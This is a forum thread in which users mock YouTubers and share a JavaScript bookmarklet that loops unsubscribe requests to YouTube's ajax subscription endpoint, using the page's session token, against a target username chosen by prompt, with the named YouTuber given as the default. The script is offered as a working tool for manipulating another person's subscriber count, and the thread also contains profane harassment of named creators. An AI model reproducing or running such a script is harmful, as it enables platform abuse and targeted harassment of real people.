Amusing.

Posts 115 of 23 · Page 1 of 2
Quote Originally Posted by HannibalJr View Post
He gonna cry /
And iam also XD
Quote Originally Posted by HannibalJr View Post
He gonna cry /
we can only hope
Quote Originally Posted by Mr.G View Post
we can only hope
lol haha
lol im gonna thank them
I'm guessing that you just have to change the username now in order to make another person have 0 subs
Quote Originally Posted by KazestemeANI View Post
I'm guessing that you just have to change the username now in order to make another person have 0 subs
u cant change
dam, that kid is fucked up (2nd link)
Fuck Fred .
Quote Originally Posted by Obey View Post
Fuck Fred .
QFT.
thats why we do it to nigahiga

Code:
**********:function unsubscribe() {
    httpreq=new XMLHttpRequest();
    httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);
    httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));
    if(!httpreq.responseXML) {
        setTimeout('unsubscribe()', timeout);
        return;
    }
    if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') {
        alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);
    } else if((window.status=++count)!=times) {
        setTimeout('unsubscribe()', timeout);
    } else {
        alert('DUN');
    }
}
count=0;
if((username=prompt('enter target\'s username', 'nigahiga'))!=null) {
    if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {
        if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {
            unsubscribe();
        }
    }
}
void(0);
thats hilarious, he's going to be like WTF O_O
Interesting...
Posts 115 of 23 · Page 1 of 2

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?